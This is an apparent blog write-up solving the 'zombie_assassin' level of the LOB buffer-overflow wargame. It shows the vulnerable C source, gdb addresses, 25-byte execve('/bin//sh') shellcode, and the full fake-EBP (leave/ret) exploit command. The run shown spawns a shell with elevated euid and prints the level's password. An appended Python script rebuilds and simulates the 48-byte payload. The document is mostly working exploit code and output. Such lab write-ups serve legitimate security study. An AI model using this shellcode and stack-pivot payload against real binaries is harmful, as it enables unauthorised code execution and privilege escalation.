  • [lob] assassin -> zombie_assassin
    Study/LOB 2014. 7. 30. 20:07

    [assassin@localhost assassin]$ cat zombie_assassin.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - zombie_assassin
            - FEBP
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* strncpy (not included in the original listing) */

    int main(int argc, char *argv[])
    {
        char buffer[40];

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        /* argv[1][47] is the byte that lands in the high byte of main's saved
           return address: a stack address (0xbfxxxxxx) is rejected ... */
        if(argv[1][47] == '\xbf')
        {
            printf("stack retbayed you!\n");
            exit(0);
        }

        /* ... and so is a shared-library address (0x40xxxxxx) */
        if(argv[1][47] == '\x40')
        {
            printf("library retbayed you, too!!\n");
            exit(0);
        }

        // strncpy instead of strcpy!
        // 48 bytes = 40 (buffer) + 4 (saved EBP) + 4 (return address), so only
        // the saved frame pointer and the return address can be overwritten
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
    }

    The leave/ret pair at the end of main, reused as the return address (the "fake EBP" gadget):

    0x80484df <main+159>:    leave 
    0x80484e0 <main+160>:    ret

    gdb output from the test run:

    0xbffffc52:    0x90909090
    0xbffffb08

    25-byte shellcode (execve("/bin//sh")):
    shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


    First layout plan (the final payload below differs): payload = [sc] + 23-byte shellcode + 13 bytes of NOPs + [sc-8] + leave/ret

    Test against a copy of the binary whose name has the same length (15 characters, so the stack addresses do not shift), with the return address pointing at the leave/ret gadget:

    ./aaaaaaaaaaaaaaa `python -c'print "a"*40+"\xa0\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`


    `python -c 'print "bbbb"+"\x9f\xfa\xff\xbf"+"\x90"*7 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" +"\x90\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
       
    [assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "bbbb"+"\x9f\xfa\xff\xbf"+"\x90"*7 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" +"\x90\xfa\xff\xbf"+"\xdf\x84\x04\x08"'`
    bbbb<raw payload bytes echoed by printf, not printable>
    bash$ id
    uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
    bash$ my-pass
    euid = 516
    no place to hide
    bash$
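    As an added example (not part of the original write-up), the Python script below builds the same 48-byte payload from the addresses used above and emulates the two leave/ret sequences (main's epilogue, then the gadget) to confirm where execution lands. It assumes 0xbffffa90 is the address of buffer (the value written into the saved EBP) and 0x080484df is the leave/ret gadget, exactly as in the payload above; on another machine both must be re-read from gdb.

```python
import struct

# Values taken from the write-up above. They are assumed to be the addresses
# observed in the author's gdb session and will differ on another machine.
BUF_ADDR = 0xbffffa90    # address of buffer (start of the copied argv[1] bytes)
LEAVE_RET = 0x080484df   # 'leave; ret' at main+159
JUNK_EBP = b"bbbb"       # popped into ebp by the gadget's leave, never dereferenced

# 25-byte execve("/bin//sh") shellcode from the write-up
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             b"\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")

BUF_LEN = 40
COPY_LEN = 48            # strncpy(buffer, argv[1], 48): 40 buffer + 4 SFP + 4 RET


def p32(v):
    return struct.pack("<I", v)


def u32(b):
    return struct.unpack("<I", bytes(b))[0]


def build_payload(buf_addr=BUF_ADDR, gadget=LEAVE_RET):
    """Build the 48-byte fake-frame payload.

    Inside buffer (40 bytes):
      [0:4]   junk, popped into ebp by the gadget's leave
      [4:8]   address the gadget's ret jumps to (start of the shellcode)
      [8:15]  NOP sled
      [15:40] shellcode
    Followed by the overwritten SFP (= buf_addr, our fake frame) and RET (= gadget).
    """
    nop_len = BUF_LEN - len(JUNK_EBP) - 4 - len(SHELLCODE)   # 7
    sc_addr = buf_addr + len(JUNK_EBP) + 4 + nop_len          # buf_addr + 15
    frame = JUNK_EBP + p32(sc_addr) + b"\x90" * nop_len + SHELLCODE
    assert len(frame) == BUF_LEN
    return frame + p32(buf_addr) + p32(gadget)


def passes_filters(payload):
    """Mirror the checks in zombie_assassin.c plus the strncpy constraint."""
    if len(payload) < COPY_LEN:
        return False
    if payload[47] in (0xbf, 0x40):      # stack / library return address rejected
        return False
    if b"\x00" in payload[:COPY_LEN]:    # strncpy stops copying at the first NUL
        return False
    return True


def simulate(payload, buf_addr=BUF_ADDR, gadget=LEAVE_RET):
    """Emulate main's 'leave; ret' followed by the gadget's 'leave; ret'.

    Memory is only the 48 copied bytes starting at buf_addr; any other read
    is treated as a fault. Returns (eip, ebp) after the second ret.
    """
    mem = bytearray(payload[:COPY_LEN])

    def read32(addr):
        off = addr - buf_addr
        if not 0 <= off <= COPY_LEN - 4:
            raise MemoryError("read outside the copied bytes: 0x%08x" % addr)
        return u32(mem[off:off + 4])

    def leave_ret(ebp):
        esp = ebp                 # leave: mov esp, ebp
        ebp = read32(esp)         #        pop ebp
        esp += 4
        eip = read32(esp)         # ret:   pop eip
        return eip, ebp

    ebp = buf_addr + BUF_LEN      # main's ebp points at the saved-EBP slot
    eip, ebp = leave_ret(ebp)     # main's epilogue: ebp <- fake frame, eip <- RET
    if eip != gadget:
        raise RuntimeError("RET did not land on the gadget")
    eip, ebp = leave_ret(ebp)     # gadget: esp now points into the fake frame
    return eip, ebp


def shellcode_range(payload, buf_addr=BUF_ADDR):
    """Address range occupied by the shellcode once copied into buffer."""
    start = buf_addr + payload.index(SHELLCODE)
    return start, start + len(SHELLCODE)


if __name__ == "__main__":
    pl = build_payload()
    eip, ebp = simulate(pl)
    lo, hi = shellcode_range(pl)
    print("filters passed: %s, eip=0x%08x ebp=0x%08x" % (passes_filters(pl), eip, ebp))
    print("shellcode at 0x%08x-0x%08x, hit: %s" % (lo, hi, lo <= eip < hi))
```

    Because argv[1] is copied with strncpy, all 48 bytes must be NUL-free, and byte 47 (the high byte of the return address) must be neither 0xbf nor 0x40; that is why the return address has to point into the binary's own text segment (0x08...) instead of at the stack or libc, and why the stack address is only reached indirectly through the saved EBP. passes_filters checks both constraints, and simulate shows that the second leave/ret lands exactly on the first shellcode byte.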
